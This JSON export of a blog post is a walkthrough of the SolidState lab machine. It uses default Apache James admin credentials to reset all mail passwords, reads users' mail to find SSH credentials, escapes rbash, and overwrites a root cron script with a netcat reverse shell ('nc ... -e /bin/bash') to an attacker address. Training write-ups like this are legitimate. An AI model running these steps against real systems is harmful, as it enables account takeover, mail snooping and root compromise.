{"id":1340,"date":"2021-07-13T21:22:25","date_gmt":"2021-07-13T21:22:25","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1340"},"modified":"2021-07-13T21:22:25","modified_gmt":"2021-07-13T21:22:25","slug":"solidstate-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/13\/solidstate-1\/","title":{"rendered":"SOLIDSTATE: 1"},"content":{"rendered":"<h2>About the Machine<\/h2>\n<p><strong>Description:<\/strong><br \/>\nIt was originally created for HackTheBox<\/p>\n<p><strong>Vulnhub Page:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/solidstate-1,261\/\">https:\/\/www.vulnhub.com\/entry\/solidstate-1,261\/<\/a><\/p>\n<p><strong>Download Page:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/solidstate\/SolidState.zip\">https:\/\/download.vulnhub.com\/solidstate\/SolidState.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Let's start by identifying the machine.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132\nStarting arp-scan 1.9.7 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.6.1 00:50:56:c0:00:08   VMware, Inc.\n192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.\n192.168.6.142   00:0c:29:0c:40:ff   VMware, Inc.\n192.168.6.254   00:50:56:e2:4d:69   VMware, Inc.\n\n21 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.9.7: 256 hosts scanned in 1.939 seconds (132.03 hosts\/sec). 
4 responded\n<\/code><\/pre>\n<p>Let's continue with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">[*] Scan: 182\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-07-13 17:13 EDT\nNmap scan report for 192.168.6.142\nHost is up (0.0010s latency).\nNot shown: 65529 closed ports\nPORT     STATE SERVICE     VERSION\n22\/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)\n|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)\n|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)\n25\/tcp   open  smtp        JAMES smtpd 2.3.2\n|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.6.132 [192.168.6.132]), PIPELINING, ENHANCEDSTATUSCODES, \n80\/tcp   open  http        Apache httpd 2.4.25 ((Debian))\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Home - Solid State Security\n110\/tcp  open  pop3        JAMES pop3d 2.3.2\n119\/tcp  open  nntp        JAMES nntpd (posting ok)\n4555\/tcp open  james-admin JAMES Remote Admin 2.3.2\nMAC Address: 00:0C:29:0C:40:FF (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: Host: solidstate; OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   1.02 ms 192.168.6.142\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 31.63 seconds\n<\/code><\/pre>\n<p>Let's try to gather information from the ports other than http. 
After the nmap output I searched for an exploit and found the results below.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# searchsploit JAMES  2.3.2\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                              |  Path\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nApache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)                                        | linux\/remote\/48130.rb\nApache James Server 2.3.2 - Remote Command Execution                                                                        | linux\/remote\/35513.py\n---------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# cp $(locate linux\/remote\/35513.py) .\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# ls\n35513.py\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# cat 35513.py                        \n#!\/usr\/bin\/python\n#\n# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution\n# Date: 16\\10\\2014\n# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec\n# Vendor Homepage: http:\/\/james.apache.org\/server\/\n# Software Link: http:\/\/ftp.ps.pl\/pub\/apache\/james\/server\/apache-james-2.3.2.zip\n# Version: Apache James Server 2.3.2\n# Tested on: Ubuntu, Debian\n# Info: This exploit works on default installation of Apache 
James Server 2.3.2\n# Info: Example paths that will automatically execute payload on some action: \/etc\/bash_completion.d , \/etc\/pm\/config.d\n\nimport socket\nimport sys\nimport time\n\n# specify payload\n#payload = &#039;touch \/tmp\/proof.txt&#039; # to exploit on any user \npayload = &#039;[ &quot;$(id -u)&quot; == &quot;0&quot; ] &amp;&amp; touch \/root\/proof.txt&#039; # to exploit only on root\n# credentials to James Remote Administration Tool (Default - root\/root)\nuser = &#039;root&#039;\npwd = &#039;root&#039;\n...<\/code><\/pre>\n<p>When I saw the line <strong>credentials to James Remote Administration Tool (Default - root\/root)<\/strong>, I wanted to give it a try, and it worked.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# nc 192.168.6.142 4555\nJAMES Remote Administration Tool 2.3.2\nPlease enter your login and password\nLogin id:\nroot\nPassword:\nroot\nWelcome root. HELP for a list of commands\nhelp\nCurrently implemented commands:\nhelp                                    display this help\nlistusers                               display existing accounts\ncountusers                              display the number of existing accounts\nadduser [username] [password]           add a new user\nverify [username]                       verify if specified user exist\ndeluser [username]                      delete existing user\nsetpassword [username] [password]       sets a user&#039;s password\nsetalias [user] [alias]                 locally forwards all email for &#039;user&#039; to &#039;alias&#039;\nshowalias [username]                    shows a user&#039;s current email alias\nunsetalias [user]                       unsets an alias for &#039;user&#039;\nsetforwarding [username] [emailaddress] forwards a user&#039;s email to another email address\nshowforwarding [username]               shows a user&#039;s current email forwarding\nunsetforwarding [username]    
          removes a forward\nuser [repositoryname]                   change to another user repository\nshutdown                                kills the current JVM (convenient when James is run as a daemon)\nquit                                    close connection\nlistusers\nExisting accounts 5\nuser: james\nuser: thomas\nuser: john\nuser: mindy\nuser: mailadmin\n\nUnknown command \nsetpassword james root \nPassword for james reset\nsetpassword thomas root\nPassword for thomas reset\nsetpassword john root\nPassword for john reset\nsetpassword mindy root\nPassword for mindy reset\nsetpassword mailadmin root\nPassword for mailadmin reset\nexit\nUnknown command exit\n^C<\/code><\/pre>\n<p>Now I can read everyone's mail.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# telnet 192.168.6.142 110                                                                                                                              1 \u2a2f\nTrying 192.168.6.142...\nConnected to 192.168.6.142.\nEscape character is &#039;^]&#039;.\n+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready \nuser john\n+OK\npass root\n+OK Welcome john\nlist\n+OK 1 743\n1 743\n.\nretr 1\n+OK Message follows\nReturn-Path: &lt;mailadmin@localhost&gt;\nMessage-ID: &lt;9564574.1.1503422198108.JavaMail.root@solidstate&gt;\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: john@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581\n          for &lt;john@localhost&gt;;\n          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: New Hires access\nJohn, \n\nCan you please restrict mindy&#039;s access until she gets read on to the program. 
Also make sure that you send her a tempory password to login to her accounts.\n\nThank you in advance.\n\nRespectfully,\nJames\n\n.\n^C^X\nexit\n^C^C^C^C  \nhelp\n^C^X^X^XConnection closed by foreign host.\n<\/code><\/pre>\n<p>Let's see if we can get hold of a password.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# telnet 192.168.6.142 110                                                                                                                              1 \u2a2f\nTrying 192.168.6.142...\nConnected to 192.168.6.142.\nEscape character is &#039;^]&#039;.\n+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready \nuser mindy\n+OK\npass root\n+OK Welcome mindy\nlist\n+OK 2 1945\n1 1109\n2 836\n.\nrety 1\n-ERR\nretr 1\n+OK Message follows\nReturn-Path: &lt;mailadmin@localhost&gt;\nMessage-ID: &lt;5420213.0.1503422039826.JavaMail.root@solidstate&gt;\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798\n          for &lt;mindy@localhost&gt;;\n          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Welcome\n\nDear Mindy,\nWelcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.\n\nWe are looking forward to you joining our team and your success at Solid State Security. 
\n\nRespectfully,\nJames\n.\nretr 2\n+OK Message follows\nReturn-Path: &lt;mailadmin@localhost&gt;\nMessage-ID: &lt;16744123.2.1503422270399.JavaMail.root@solidstate&gt;\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=us-ascii\nContent-Transfer-Encoding: 7bit\nDelivered-To: mindy@localhost\nReceived: from 192.168.11.142 ([192.168.11.142])\n          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581\n          for &lt;mindy@localhost&gt;;\n          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nDate: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)\nFrom: mailadmin@localhost\nSubject: Your Access\n\nDear Mindy,\n\nHere are your ssh credentials to access the system. Remember to reset your password after your first login. \nYour access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. \n\nusername: mindy\npass: P@55W0rd1!2@\n\nRespectfully,\nJames\n\n.\nquit\n+OK Apache James POP3 Server signing off.\nConnection closed by foreign host.\n<\/code><\/pre>\n<p>Great. With these I tried connecting over ssh and got my first flag, but I ran into <strong>rbash<\/strong>.<\/p>\n<pre><code class=\"language-sh\">\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# ssh mindy@192.168.6.142  \nThe authenticity of host &#039;192.168.6.142 (192.168.6.142)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;192.168.6.142&#039; (ECDSA) to the list of known hosts.\nmindy@192.168.6.142&#039;s password: \nLinux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Aug 22 14:00:02 2017 from 192.168.11.142\nmindy@solidstate:~$ pwd\n\/home\/mindy\nmindy@solidstate:~$ whoami\n-rbash: whoami: command not found\nmindy@solidstate:~$ ls\nbin  user.txt\nmindy@solidstate:~$ cat user.txt\n914d0a4ebc1777889b5b89a23f556fd75\nmindy@solidstate:~$ \n<\/code><\/pre>\n<p>I was able to bypass it as shown below.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/solid]\n\u2514\u2500# ssh mindy@192.168.6.142  -t \"bash --noprofile\"                                                                                                        1 \u2a2f\nmindy@192.168.6.142's password: \n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id\nuid=1001(mindy) gid=1001(mindy) groups=1001(mindy)\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd\n\/home\/mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ ls\njames  mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ ls\njames  mindy\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home$ cd james\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home\/james$ ls\nDesktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/home\/james$ alias ls=\"ls -al\"<\/code><\/pre>\n<p>After looking around inside, I found a file owned by root that 
I could modify. I edited the file in the hope that it was registered in crontab. In fact I was fairly sure it was in crontab, because I had been saving my earlier search output under the \/tmp folder and had noticed it being deleted after a while.<\/p>\n<pre><code class=\"language-sh\">${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ find \/ -writable -type f -exec ls -al {} \\; 2>\/dev\/null | tee result\n<\/code><\/pre>\n<pre><code class=\"language-sh\">${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat result | grep root | grep py\n-rwxrwxrwx 1 root root 105 Aug 22  2017 \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ nano \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ \n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat \/opt\/tmp.py\n#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n     os.system('rm -r \/tmp\/* ')\nexcept:\n     sys.exit()\n\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ nano \/opt\/tmp.py\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ cat \/opt\/tmp.py\n#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n     os.system('nc 192.168.6.132 1822 -e \/bin\/bash')\nexcept:\n     sys.exit()\n\n${debian_chroot:+($debian_chroot)}mindy@solidstate:\/tmp$ \n<\/code><\/pre>\n<p>We can confirm it as shown below.<\/p>\n<pre><code class=\"language-sh\"># crontab -l\ncrontab -l\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use '*' in these fields 
(for 'any').# \n# Notice that tasks will be started based on the cron's system\n# daemon's notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n# For more information see the manual pages of crontab(5) and cron(8)\n# \n# m h  dom mon dow   command\n*\/3 * * * * python \/opt\/tmp.py\n\n# whoami\nwhoami\nroot\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>About the Machine Description: It was originally created for HackTheBox Vulnhub Page: https:\/\/www.vulnhub.com\/entry\/solidstate-1,261\/ Download Page: https:\/\/download.vulnhub.com\/solidstate\/SolidState.zip Walkthrough Let's start by identifying the machine. \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# arp-scan -l&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/13\/solidstate-1\/\">Read more<span class=\"screen-reader-text\">SOLIDSTATE: 
1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[565,563,317,564],"class_list":["post-1340","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-apache-james-server","tag-crontab","tag-find","tag-restricted-shell","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1340"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340\/revisions"}],"predecessor-version":[{"id":1342,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1340\/revisions\/1342"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}